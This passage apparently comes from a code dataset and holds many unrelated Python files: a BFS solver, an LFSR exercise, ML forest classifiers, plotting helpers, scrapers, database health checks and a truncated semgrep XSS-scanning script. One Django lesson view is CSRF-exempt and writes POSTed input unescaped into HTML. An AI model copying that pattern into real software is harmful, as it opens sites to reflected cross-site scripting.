slice['slice_id']\n\n return slices\n","sub_path":"PLC/Methods/GetSlices.py","file_name":"GetSlices.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29210347","text":"from Vector import Vector\nimport os\nimport random\nimport shelve\n\nclass PointsInShortStrings:\n def __init__(self, db_filename, window_size=20, character_map={}):\n self.db_filename = db_filename\n try:\n self.string_count = self.getValue('__string_count')\n self.window_size = self.getValue('__window_size')\n self.character_map = self.getValue('__character_map')\n self.category_count = self.getValue('__category_count')\n except:\n db = shelve.open(self.db_filename, 'n')\n db.close()\n self.setValues([\n ['__string_count', 0],\n ['__window_size', window_size],\n ['__character_map', character_map]\n ])\n self.character_type_count = max(self.character_map.values())\n self.vector_size = (2 * self.window_size + 1) * self.character_type_count\n\n def setValue(self, key, value):\n with shelve.open(self.db_filename, 'w') as db:\n db[key] = value\n\n def setValues(self, data):\n with shelve.open(self.db_filename, 'w') as db:\n for [key, value] in data:\n db[key] = value\n\n def getValue(self, key):\n with shelve.open(self.db_filename, 'r') as db:\n return db[key]\n\n def addString(self, value, points):\n next_id = self.getValue('__string_count')\n self.setValues([\n [str(next_id), {\"text\": value, \"points\": points}],\n [\"__string_count\", next_id + 1]\n ])\n\n def getRandomDataPoint(self, category_number):\n result = 
Vector(self.vector_size)\n        random_file = self.getValue(str(random.randrange(0, self.string_count)))\n        file_size = len(random_file['text'])\n        if category_number == 0:\n            # initialize before the loop: the original read random_position before assigning it (UnboundLocalError)\n            random_position = random.randrange(0, file_size)\n            while random_position not in random_file['points']:\n                random_position = random.randrange(0, file_size)\n            start_point = max(0, random_position - self.window_size)\n            first_coordinate = self.window_size - (random_position - start_point)\n        else:\n            start_point = max(0, random_file['points'][category_number - 1] - self.window_size)\n            first_coordinate = self.window_size - (random_file['points'][category_number - 1] - start_point)\n        # assumption: the context window spans 2*window_size+1 characters, matching vector_size; slicing to the end of the text would index past the vector\n        end_point = min(file_size, start_point + 2 * self.window_size + 1)\n        context = random_file['text'][start_point:end_point]\n        for char in context:\n            result[first_coordinate * self.character_type_count + self.character_map.get(char, 0)] = 1\n            first_coordinate += 1\n        return result\n\n","sub_path":"PointsInShortStrings.py","file_name":"PointsInShortStrings.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"105023074","text":"x = input()\nupper = 0\nlower = 0\nfor i in x:\n    if i.isupper() == True:\n        upper = upper + 1\n    elif i.isalpha() == True:\n        lower = lower + 1\n\nprint(\"UPPER \", upper)\nprint(\"LOWER \", lower)","sub_path":"q014.py","file_name":"q014.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356873724","text":"def bfs():\n    if len(queue) == 0:\n        return\n\n    current = queue.pop(0)\n    for house in adjHouses[current]:\n        if not visited[house-1]:\n            visited[house-1] = True\n            distMap[house] = [distMap[current][0]+1, current]\n            queue.append(house)\n    bfs()\n\n\n\n\ninData = input().split()\n\nnumHouses = int(inData[0])\nnumRoads = int(inData[1])\nhouseA = int(inData[2])\nhouseB = int(inData[3])\nadjHouses = {}\ndistMap = {}\n\nfor i in range(numHouses):\n    adjHouses[i+1] = []\n    distMap[i+1] = []\n    \nfor i in range(numRoads):\n    road = input().split()\n    roadOne = int(road[0])\n    roadTwo = int(road[1])\n    adjHouses[roadOne].append(roadTwo)\n    adjHouses[roadTwo].append(roadOne)\n    \nqueue = [houseA]\nvisited = [False for i in range(numHouses)]\nvisited[houseA-1] = True\ndistMap[houseA] = [0, 0]\n\nbfs()\n\n\nif visited[houseB-1]:\n    path = [houseB]\n    while path[-1] != 0:\n        path.append(distMap[path[-1]][1])\n    path.pop()\n    print(\"GO ALBERT\")\n    print(path)\nelse:\n    print(\"NO ALBERT\")","sub_path":"Problem Sets/old Set 2/dfsbfs/bfsrecursive.py","file_name":"bfsrecursive.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"21798670","text":"# -*- coding = utf - 8 -*-\r\n#@Time : 2020/12/15 16:28\r\n#@Author : sunzy\r\n#@File : LFSR.py\r\n\r\ndef lfsr(inti, top):\r\n    sum = 0\r\n    inti2 = \"0\"*len(inti)\r\n    inti2 = list(inti2) # 初始化出一个与原始序列等长的列表,便于后面的计算\r\n    inti1 = ''\r\n    for i in range(len(inti)):\r\n        if top[i] == \"1\":\r\n            sum += int(inti[i]) # 计算本原多项式中1的个数\r\n    sum = sum % 2 # 计算出第一位的值\r\n    for i in range(len(inti)): # 实现左移\r\n        if i == 0:\r\n            inti2[i] = str(sum)\r\n        else:\r\n            inti2[i] = inti[i - 1]\r\n    inti1 = inti1.join(inti2) # 将数组转成字符串\r\n    return inti1\r\n\r\ndef main():\r\n    inti_str = str(input(\"请输入初始化序列:\"))\r\n    inti_str_backup = inti_str # 备份初始化序列,用于后面的比较\r\n    top = str(input(\"请输入本原多项式:\"))\r\n    top = top[::-1]\r\n    for i in range(2 ** len(inti_str) + 1):\r\n        if inti_str_backup == inti_str and i != 0 and i == 2 ** len(inti_str) - 1:\r\n            
print(\"第{0}次\".format(i), inti_str_backup)\r\n print(\"是本原多项式且周期是\" + str(i))\r\n break\r\n elif inti_str_backup == inti_str and i != 0 and i != 2 ** len(inti_str) - 1:\r\n print(\"第{0}次\".format(i), inti_str_backup)\r\n print(\"不是本原多项式且周期是\" + str(i))\r\n break\r\n print(\"第{0}次\".format(i), inti_str_backup)\r\n inti_str_backup = lfsr(inti_str_backup, top)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n'''\r\nlst = 011100010100100101\r\nkey = 011100010100100101\r\n本原多项式,周期为2^18-1=262143\r\n\r\nkey = 1000100000000101\r\n\r\nkey = 1010100000000001 \r\n\r\nkey = 10000000000000100\r\nkey = 10000000000000000100\r\nlst = 111\r\nkey = 101\r\n本原多项式,周期为2^3-1=7\r\n\r\nlst = 1111\r\nkey = 1111\r\n非本原多项式,周期为5 \r\n'''\r\n# 1010100000000001","sub_path":"密码学实验/序列密码/LFSR.py","file_name":"LFSR.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"462935442","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@csrf_exempt\ndef index(request):\n if request.method == 'POST':\n nome = request.POST.get('name', u'não tem nome')\n return HttpResponse(u'O nome é %s' % nome)\n else:\n form = \"\"\"\n <form action='.' method='post'>\n <input type='text' name='name' maxlength='100' />\n <button type='submit'>Enviar</button>\n </form>\n \"\"\"\n return HttpResponse(form)\n\n\ndef detail(request, username):\n return HttpResponse(u'O nome de usuário é: %s' % username)\n","sub_path":"aula3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364224799","text":"'''\nmodels.py\n\nCreated by \n\nname: Federico Marcuzzi\ne-mail: federico.marcuzzi@unive.it\n\ndate 20/02/2020\n'''\n\nimport numpy as np\n\nfrom collections import Counter\nfrom sklearn import tree\n\nfrom sklearn.base import BaseEstimator\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.model_selection import train_test_split\n\n\n# tree wrapper.\nclass TreeWrapper():\n\tdef __init__(self):\n\t\tself.node_count = 0\n\t\tself.children_left = []\n\t\tself.children_right = []\n\t\tself.feature = []\n\t\tself.threshold = []\n\t\tself.value = []\n\n# this class manages the attributes and methods of trained trees in a projection of the original dataset.\nclass ProjectedDecisionTreeClassifier():\n\tdef __init__(self, criterion='gini', splitter='best', max_depth=None, min_samples_split=2, min_samples_leaf=1, min_weight_fraction_leaf=0.0, max_features=None, random_state=None, max_leaf_nodes=None, min_impurity_decrease=0.0, min_impurity_split=None, class_weight=None, presort=False):\n\t\tself.tree_ = TreeWrapper()\n\t\tself.n_feat = 0\n\t\tself.n_features_ = 0\n\t\tself.feature_importances_ = []\n\t\tself.albero = tree.DecisionTreeClassifier(criterion, splitter, max_depth, min_samples_split, min_samples_leaf, min_weight_fraction_leaf, max_features, random_state, max_leaf_nodes, min_impurity_decrease, min_impurity_split, class_weight, presort)\n\n\tdef fit_aux(self):\n\t\tself.n_features_ = self.albero.n_features_\n\t\tself.feature_importances_build_ = self.albero.feature_importances_\n\n\t\tself.tree_.node_count = self.albero.tree_.node_count\n\n\t\tself.tree_.children_left = self.albero.tree_.children_left\n\t\tself.tree_.children_right = self.albero.tree_.children_right\n\n\t\tself.tree_.feature = np.asarray([(lambda x: self.idx[x] if x >=0 else -2)(f) for f 
in self.albero.tree_.feature])\n\t\tself.tree_.threshold = self.albero.tree_.threshold\n\t\tself.tree_.value = self.albero.tree_.value\n\n\t\tself.feature_importances_ = np.zeros((self.n_feat, ))\n\n\t\tfor idx_f,imp_f in zip(self.idx,self.feature_importances_build_):\n\t\t\tself.feature_importances_[idx_f] = imp_f\n\n\tdef fit(self,X,y,idx):\n\t\t_, self.n_feat = np.shape(X)\n\t\tself.idx = np.copy(idx)\n\t\tself.idx.sort()\n\t\tself.albero.fit(X[:,self.idx],y)\n\t\tself.fit_aux()\n\n\tdef predict(self,X):\n\t\treturn self.albero.predict(X[:,self.idx])\n\n\tdef score(self,X,y):\n\t\treturn self.albero.score(X[:,self.idx],y)\n\n\tdef decision_path(self,X,check_input=True):\n\t\treturn self.albero.decision_path(X[:, self.idx],check_input)\n\n# this class manages the attributes and methods of a forest with trees trained on a projection of the original dataset.\nclass ProjectedForest(BaseEstimator):\n\tdef __init__(self):\n\t\tself.forest = []\n\t\tself.index = -1\n\t\tself.iter = []\n\n\tdef check_fit(self):\n\t\tif len(self.forest) == 0:\n\t\t\traise NotFittedError('This RandomForestClassifier instance is not fitted yet. Call \\'fit\\' with appropriate arguments before using this method.')\n\n\tdef __iter__(self):\n\t\tself.check_fit()\n\t\tself.iter.append(0)\n\t\tself.index += 1\n\t\treturn self\n\n\tdef __next__(self):\n\t\tself.check_fit()\n\t\tif self.iter[self.index] < self.n_trees:\n\t\t\tself.iter[self.index] += 1\n\t\t\treturn self.forest[self.iter[self.index] - 1]\n\t\telse:\n\t\t\tdel self.iter[self.index]\n\t\t\tself.index -= 1\n\t\t\traise StopIteration\n\n\tdef fit(self,X,y):\n\t\tself.max_label = Counter(y).most_common()[0][0]\n\n\tdef predict(self,X):\n\t\tself.check_fit()\n\t\tpredict = np.sum([tr.predict(X) for tr in self.forest],axis=0)\n\n\t\tif self.n_trees % 2 == 0:\n\t\t\tpredict[predict==0] = self.max_label\n\n\t\tpredict[predict<0] = -1\n\t\tpredict[predict>0] = 1\n\t\treturn predict\n\n\tdef score(self,X,y):\n\t\treturn np.sum(self.predict(X)==y) / len(y)\n\n# this class is the implementation of our robust FPF ensemble method.\nclass FeaturePartitionedForest(ProjectedForest):\n\tdef __init__(self,b,r=10,min_acc=None,random_state=None,max_leaf_nodes=None): \n\t\tsuper().__init__()\n\t\tself.forest = []\n\t\tself.b = b\t\n\t\tself.r = r\n\t\tself.min_acc = min_acc\n\t\tself.random_state = random_state\n\t\tself.max_leaf_nodes = max_leaf_nodes\n\t\tnp.random.seed(seed=random_state)\n\n\tdef fit(self,X,y,X_val=None,y_val=None):\n\t\tsuper().fit(X,y)\n\t\tn_ist, n_feat = np.shape(X)\n\t\tidx_f = np.arange(n_feat)\n\t\tmin_num_tree = 2 * self.b + 1\n\n\t\t# 'is None' rather than '== None': '==' on a numpy array compares elementwise and breaks these truth tests.\n\t\tif self.min_acc is None:\n\t\t\tself.min_acc = Counter(y).most_common()[0][1] / n_ist\n\n\t\tif X_val is None:\n\t\t\tX_val = X\n\t\t\ty_val = y\n\n\t\tself.forest_counter = 0\n\t\t# for each round 'r' create a sub-forest of '2b + 1' trees.\n\t\tfor _ in range(self.r):\n\t\t\tforest = []\n\t\t\tidx_f = np.copy(idx_f)\n\t\t\t# shuffles feature indexes.\n\t\t\tnp.random.shuffle(idx_f)\n\t\t\t# performs robust partitioning: split the feature sets into '2b + 1' partitions.\n\t\t\tslice_idx = np.array_split(idx_f, min_num_tree)\n\n\t\t\t# for each partition trains a decision tree.\n\t\t\tfor idx in slice_idx:\n\t\t\t\tclf = ProjectedDecisionTreeClassifier(random_state=self.random_state,max_leaf_nodes=self.max_leaf_nodes)\n\t\t\t\tclf.fit(X,y,idx)\n\n\t\t\t\t# verify that the tree contains at least one feature.\n\t\t\t\tif len(clf.tree_.feature) > 1:\n\t\t\t\t\tforest.append(clf)\n\n\t\t\t# verifies that a sub-forest of '2b 
+ 1' trees has been created.\n\t\t\tif len(forest) >= min_num_tree:\n\t\t\t\tpredict = np.sum([tr.predict(X_val) for tr in forest],axis=0)\n\t\t\t\tpredict[predict<0] = -1\n\t\t\t\tpredict[predict>0] = 1\n\t\t\t\t\n\t\t\t\tacc = np.sum(predict==y_val) / len(y_val)\n\t\t\t\t# given an 'X_val' dataset if the accuracy of the sub-forest is below the majority class percentage, discard the forest.\n\t\t\t\tif acc > self.min_acc:\n\t\t\t\t\tself.forest += forest\n\t\t\t\t\tself.forest_counter += 1\n\n\t\tself.n_trees = len(self.forest)\n\n\t\tprint('t_size: ',min_num_tree,'#frst: ',self.forest_counter,' #tr: ',self.n_trees)\n\t\t# if it does not generate at least one forest it raises an error\n\t\tif self.n_trees < 1:\n\t\t\traise Exception('Error: a robust forest cannot be created with the specified parameters.')\n\n# this class is the implementation of RSM ensemble method.\nclass RandomSubspaceMethod(ProjectedForest):\n\tdef __init__(self,p=.2,n_trees=1,random_state=None,max_leaf_nodes=None): \n\t\tsuper().__init__()\n\t\tself.forest = []\n\t\tself.p = p\t\n\t\tself.n_trees = n_trees\n\t\tself.random_state = random_state\n\t\tself.max_leaf_nodes = max_leaf_nodes\n\t\tnp.random.seed(seed=random_state)\n\n\tdef fit(self,X,y):\n\t\tsuper().fit(X,y)\n\t\t_, n_feat = np.shape(X)\n\t\tidx_f = np.arange(n_feat)\n\t\tft_sb_size = int(self.p * n_feat)\n\n\t\tif ft_sb_size < 1 or ft_sb_size > n_feat:\n\t\t\tprint('Error: parameter \"p\" must be in [0,1].')\n\n\t\tself.forest_counter = 0\n\t\tfor _ in range(self.n_trees):\n\t\t\tidx_f = np.copy(idx_f)\n\t\t\t# shuffles feature indexes.\n\t\t\tnp.random.shuffle(idx_f)\n\t\t\t# performs boostrap sampling.\n\t\t\tslice_idx = idx_f[:ft_sb_size]\n\t\t\t# trains a tree with the features sample\n\t\t\tclf = ProjectedDecisionTreeClassifier(random_state=self.random_state,max_leaf_nodes=self.max_leaf_nodes)\n\t\t\tclf.fit(X,y,slice_idx)\n\n\t\t\t# verify that the tree contains at least one features.\n\t\t\tif len(clf.tree_.feature) > 1:\n\t\t\t\tself.forest.append(clf)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566795458","text":"f = open(\"d6.txt\", \"r\")\n#data = f.read().split(\"\\n\\n\")\n\n#length = 0\n#for item in data:\n# s = set(item)\n# if ('\\n' in s):\n# s.remove('\\n')\n# length+=len(s)\n\n#print(length)\nlength = 0\ndata = f.read().split(\"\\n\\n\")\nfor item in data:\n li = item.split(\"\\n\")\n chars = []\n for c in li[0]:\n elem = True\n for i in li:\n if c not in i:\n elem = False\n if elem:\n chars.append(c)\n length+=len(chars)\n","sub_path":"Day 6/d6.py","file_name":"d6.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"346175015","text":"# -*- coding: utf-8 -*-\n__author__ = 'lenovo'\n\nfrom django.forms.models import ModelForm\nfrom django.forms.widgets import TextInput, Textarea\nfrom .models import News\n\nclass NewsForm(ModelForm):\n class Meta:\n model = News\n fields = ['title', 'category', 'content']\n\n widgets = {\n 'title' : TextInput(attrs={'required': 'required', 'type':'text'}),\n 'content': Textarea(attrs={'type' : 'text'}),\n }\n def __init__(self, *args, **kwargs):\n super(NewsForm, self).__init__(*args, **kwargs)\n self.fields['title'].error_messages = {'required': '标题不能为空',\n 'invalid': u'内容格式不正确'}\n self.fields['category'].error_messages = {'required': '标签不能为空',\n 'invalid': 
u'内容格式不正确'}\n self.fields['content'].error_messages = {'invalid': u'内容格式不正确'}","sub_path":"news/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"385940673","text":"import codecs\nimport logging\nimport os\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup\n\nimport doc_curation.md\nfrom curation_utils import file_helper\nfrom doc_curation.md.file import MdFile\nfrom indic_transliteration import sanscript\n\n\ndef get_text(src_file):\n with codecs.open(src_file, \"r\", 'utf-8') as file_in:\n contents = file_in.read()\n soup = BeautifulSoup(contents, 'lxml')\n content_elements = soup.select(\"pre#content\")\n if len(content_elements) == 0:\n logging.warning(\"No stotra elements found in %s - Returning empty string\", src_file)\n return \"\"\n texts = [content_element.text for content_element in content_elements]\n text = \"\\n\\n\".join(texts)\n text = doc_curation.md.markdownify_plain_text(text)\n return text\n\n\ndef get_metadata(src_file):\n metadata = {}\n with codecs.open(src_file, \"r\", 'utf-8') as file_in:\n try:\n contents = file_in.read()\n except UnicodeDecodeError:\n logging.warning(\"Invalid character in file %s\", src_file)\n return {}\n soup = BeautifulSoup(contents, 'lxml')\n info_elements = soup.select(\"pre.inf\")\n if len(info_elements) == 0:\n logging.warning(\"No metadata found for %s\", src_file)\n return {}\n info_text = info_elements[0].text\n info_text = info_text.replace(\"% \", \"\")\n for item in info_text.split(\"\\n\"):\n if \":\" in item:\n (key, value) = item.split(\":\", maxsplit=1)\n metadata[key.strip()] = value.strip()\n return metadata\n\n\ndef dump_markdown(src_file, dest_file):\n logging.info(\"Processing %s to %s\", src_file, dest_file)\n metadata = get_metadata(src_file=src_file)\n text = get_text(src_file=src_file)\n metadata[\"title\"] = sanscript.transliterate(data=metadata[\"itxtitle\"], _from=sanscript.OPTITRANS, _to=sanscript.DEVANAGARI)\n md_file = MdFile(file_path=dest_file, frontmatter_type=MdFile.TOML)\n md_file.dump_to_file(metadata=metadata, content=text, dry_run=False)\n\n\ndef markdownify_all(src_dir, dest_dir):\n file_paths = sorted(Path(src_dir).glob(\"**/doc_*/*.html\"))\n for src_path in file_paths:\n metadata = get_metadata(src_file=src_path)\n if metadata == {}:\n logging.warning(\"No metadata found for %s\", src_path)\n continue\n filename = metadata[\"itxtitle\"].strip() + \".md\"\n dest_path = os.path.join(\n os.path.dirname(str(src_path).replace(src_dir, dest_dir)), \n filename)\n dest_path = file_helper.clean_file_path(dest_path)\n dump_markdown(src_file=src_path, dest_file=dest_path)","sub_path":"doc_curation/scraping/misc_sites/sanskrit_documents.py","file_name":"sanskrit_documents.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490420864","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2018 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"Functions to handle various cm table \"health\" checks.\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport warnings\nfrom . import mc, cm_utils\nfrom . import part_connect as PC\nfrom . 
import cm_revisions\n\n\nclass RevisionError(Exception):\n def __init__(self, hpn):\n # Call the base class constructor with the parameters it needs\n message = \"Multiple revisions found on {}\".format(hpn)\n super(RevisionError, self).__init__(message)\n\n\ndef check_for_overlap(interval_i, interval_j):\n if interval_j[0] <= interval_i[0]:\n if interval_j[1] > interval_i[0]:\n return True\n elif interval_j[0] <= interval_i[1]:\n return True\n return False\n\n\nclass Connections:\n def __init__(self, session=None):\n if session is None:\n db = mc.connect_to_mc_db(None)\n self.session = db.sessionmaker()\n else:\n self.session = session\n self.conndict = None\n\n def ensure_conndict(self):\n \"\"\"\n If not already set, writes the class variables:\n conndict - dictionary - conndict[k] = [[start, stop], []...]\n Dictionary of connections keyed as:\n upstream_part:rev:output_port:downstream_part:rev:input_port\n with the items being the start/stop times of that connection.\n So all entries will have at least one pair.\n multiple - set - {key1, ...}\n Set of connections keys with more than one pair, so there is\n the potential for conflicting times.\n num_connections:\n Integer of the total number of connections in database.\n \"\"\"\n if self.conndict is not None:\n return\n self.conndict = {}\n self.multiples = set()\n self.num_connections = 0\n for conn in self.session.query(PC.Connections).all():\n self.num_connections += 1\n connection = [conn.upstream_part, conn.up_part_rev, conn.upstream_output_port,\n conn.downstream_part, conn.down_part_rev, conn.downstream_input_port]\n connection = [x.lower() for x in connection]\n k = ':'.join(connection)\n if k in self.conndict.keys():\n self.multiples.add(k) # only add to multiples if there is more than one.\n self.conndict.setdefault(k, []).append([cm_utils.get_astropytime(conn.start_gpstime),\n cm_utils.get_stopdate(conn.stop_gpstime)])\n\n def check_for_duplicate_connections(self):\n \"\"\"\n Checks all of the self.multiple keys to see if any of them overlap in time.\n If they do, it is a conflicting duplicate connection.\n Writes a class variable:\n duplicates - list - [[key, i, j], ...]\n List which keeps triplets of duplication information as the key and the\n indices of the conflicting times.\n\n Returns the number of duplicates found.\n \"\"\"\n self.ensure_conndict()\n if len(self.multiples) == 0:\n print(\"No duplications found.\")\n return 0\n self.duplicates = []\n for k in self.multiples:\n for i in range(len(self.conndict[k])):\n for j in range(i):\n if check_for_overlap(self.conndict[k][i], self.conndict[k][j]):\n self.duplicates.append([k, i, j])\n if len(self.duplicates):\n print('{} duplications found.'.format(len(self.duplicates)))\n for d in self.duplicates:\n i = self.conndict[d[0]][d[1]]\n j = self.conndict[d[0]][d[2]]\n print('\\t{} <1>{}-{} <2>{}-{}'.format(k, i[0], i[1], j[0], j[1]))\n else:\n print('No duplications found.')\n print('Out of {} connections checked.'.format(self.num_connections))\n return len(self.duplicates)\n\n def check_for_existing_connection(self, connection, at_date='now'):\n \"\"\"\n Checks whether the provided connection is already set up for the at_date provided.\n\n Parameters:\n ------------\n connection: connection list [upstream, rev, output_port, downstream, rev, input_port]\n at_date: date for the connection to be made\n \"\"\"\n\n at_date = cm_utils.get_astropytime(at_date)\n connection = [x.lower() for x in connection]\n k = ':'.join(connection)\n self.ensure_conndict()\n if k not in 
self.conndict.keys():\n return False\n for t in self.conndict[k]:\n if cm_utils.is_active(at_date, t[0], t[1]):\n print('Connection {} is already made for {} ({} - {})'.format(k, at_date, t[0], t[1]))\n return True\n return False\n\n\ndef check_part_for_overlapping_revisions(hpn, session=None):\n \"\"\"\n Checks hpn for parts that overlap in time. They are allowed, but\n may also signal unwanted behavior.\n\n Returns list of overlapping part revisions\n\n Parameters:\n ------------\n hpn: hera part name\n \"\"\"\n\n overlap = []\n revisions = cm_revisions.get_all_revisions(hpn, session)\n for i in range(len(revisions)):\n for j in range(i):\n interval_i = [revisions[i].started, cm_utils.get_stopdate(revisions[i].ended)]\n interval_j = [revisions[j].started, cm_utils.get_stopdate(revisions[j].ended)]\n if check_for_overlap(interval_i, interval_j):\n overlap.append([revisions[i], revisions[j]])\n\n if len(overlap) > 0:\n overlapping_revs_in_single_list = []\n for ol in overlap:\n overlapping_revs_in_single_list.append(ol[0])\n overlapping_revs_in_single_list.append(ol[1])\n s = '{} and {} are overlapping revisions of part {}'.format(\n ol[0].rev, ol[1].rev, hpn)\n warnings.warn(s)\n cm_revisions.show_revisions(overlapping_revs_in_single_list)\n return overlap\n","sub_path":"hera_mc/cm_health.py","file_name":"cm_health.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"321142074","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom utils import features_target_split\nfrom statsmodels.graphics.gofplots import qqplot\nfrom scipy.stats import shapiro, normaltest\n\ndef get_class_counts(df, target, display='all', subtitle=None):\n '''\n Plots a countplot of column.\n display options are number, percent or all\n '''\n fig = plt.figure(figsize=(7,7))\n g = sns.countplot(df[target])\n for p in g.patches:\n if display == 'all':\n g.annotate ('{}\\n\\n{:.2f}%\\n'.format (p.get_height(), 100*p.get_height()/len(df)), (p.get_x(), p.get_height()+10), bbox=dict(boxstyle='round', alpha=0.1, color='grey'))\n elif display == 'number':\n g.annotate('{}'.format(p.get_height()),(p.get_x(), p.get_height()+10), bbox=dict(boxstyle='round', alpha=0.1, color='grey'))\n elif display == 'percent':\n g.annotate('{:.2f}%'.format(100*p.get_height()/len(df)),(p.get_x(), p.get_x(), p.get_height()+10),bbox = dict(boxstyle='round', alpha=0.1, color='grey') )\n else:\n raise ValueError('Display must be either of number, percent or all')\n g.set_ylim(0, max([p.get_height()*1.15 for p in g.patches]))\n g.text (x=0.5, y=1.07, s=f'Count plot of {target}', fontsize=16, weight='bold', ha='center', va='bottom', transform=g.transAxes, color='navy')\n if subtitle:\n g.text(x=0.5, y=1.03, s=f'{subtitle}', fontsize=12, alpha=0.75, ha='center', va ='bottom', transform=g.transAxes, color='darkblue')\n if any ([p.get_height()/len(df)<0.2 for p in g.patches]):\n fig.text(x=1, y=0.5, s='Imbalanced dataset', bbox=dict(boxstyle='round', color='red', alpha=0.7), color='white', fontsize=14)\n else:\n fig.text(x=1, y=0.5, s='Balanced dataset', bbox = dict(boxstyle='round', color='green', alpha=0.7), color='white', fontsize=14)\n plt.show()\n\n\n\ndef normality_plots(df, col):\n \"\"\"\n Plots distplot, QQ-plot and runs Shapiro test for verifying Gaussian distribution\n \"\"\"\n\n fig = plt.figure(figsize=(15, 5))\n shapiro_p = round(shapiro(df[col])[1], 2)\n normaltest_p = round(normaltest(df[col])[1], 2)\n plt.subplot(1, 3, 1)\n 
plt.title('Histogram for '+col, color='navy', fontsize=12)\n plt.hist(df[col])\n plt.subplot(1, 3, 2)\n plt.title('Q-Q Plot for '+col, color='brown', fontsize=12)\n qqplot(df[col], line='s', ax=plt.subplot(1, 3, 2))\n plt.subplot(1, 3, 3)\n plt.title('Normality Test Results for '+col, color='olive', fontsize=12)\n plt.plot([shapiro_p, normaltest_p], linestyle=' ', marker='x')\n plt.text(x=0.2, y=0.5, s='Shapiro\\np value\\n'+str(shapiro_p))\n plt.text(x=0.6, y=0.5, s='Normaltest\\np value\\n'+str(normaltest_p))\n plt.ylim((0, 1))\n plt.hlines(y=0.05, color='r', xmin=0, xmax=1)\n fig.text(x=0.5, y=1.07, s=f'Normality Test for {col}', fontsize=16, weight='bold',\n ha='center', va='bottom', color='navy')\n\n if all(st > 0.05 for st in [shapiro_p, normaltest_p]):\n fig.text(x=0.5, y=1.03, s=f'Distribution is Gaussian', fontsize=14,\n ha='center', va='bottom', color='darkblue')\n else:\n fig.text(x=0.5, y=1.03, s=f'Distribution is Skewed', fontsize=14,\n ha='center', va='bottom', color='darkblue')\n\n #plt.suptitle('Normality Test for '+col, fontsize=16, color='b')\n plt.show()\n","sub_path":"insurance_risk_analysis/packages/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451788169","text":"import queue\nimport random\nfrom multiprocessing.managers import BaseManager\n\ntq, rq = queue.Queue(), queue.Queue()\n\n\ndef return_task_queue():\n return tq\n\n\ndef return_result_queue():\n return rq\n\n\nclass QueueManagerForMaster(BaseManager):\n\n def __init__(self, address=None, authkey=None, serialize='pickle',\n ctx=None):\n BaseManager.__init__(self, address, authkey, serialize, ctx)\n self.task_queue, self.result_queue = None, None\n\n # callable使用lambda报错\n self.register('get_task_queue', callable=return_task_queue)\n self.register('get_result_queue', callable=return_result_queue)\n\n def put(self, item=None, block=True, timeout=None):\n self.task_queue.put(item, block, timeout)\n\n def get(self, block=True, timeout=None):\n return self.result_queue.get(block, timeout)\n\n def start(self):\n BaseManager.start(self)\n\n # 加载任务队列和结果队列\n if not self.task_queue:\n self.task_queue = self.get_task_queue()\n\n if not self.result_queue:\n self.result_queue = self.get_result_queue()\n\n\ndef main():\n manager = QueueManagerForMaster(('127.0.0.1', 5000), b'123456')\n manager.start()\n\n for loop in range(10):\n num = random.randint(0, 10000)\n print('Put task %d...' 
% num)\n manager.put(num)\n\n for loop in range(10):\n r = manager.get()\n print('Result: %s' % r)\n\n manager.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"multitask/distributedprocess/task_master.py","file_name":"task_master.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416668970","text":"import argparse\nimport json\nimport logging\nimport pandas as pd\nimport os\nimport requests\nimport subprocess\nimport sys\nimport math\nfrom sqlalchemy.orm.exec import MultipleResultsFound\nfrom app import app\nfrom models import Finding, TriageStatus\nfrom util import cwd, git_checkout\nfrom database import db\n\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(stream=sys.stderr)\nhandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nlogger.addHandler(handler)\n\nDOWNLOADED_REPO_DIRECTORY = \"downloaded_repos\"\nPACK_URL = \"https://semgrep.dev/c/p/xss\"\nLOCAL_RULESET_FILE = os.path.join(os.getcwd(), \"semgrep.yaml\")\nLEN_CMD = 3\n\nSUPPORTED_LANG_EXTS_XSS = [\n \".go\",\n \".java\",\n \".js\",\n \".json\",\n \".py\",\n 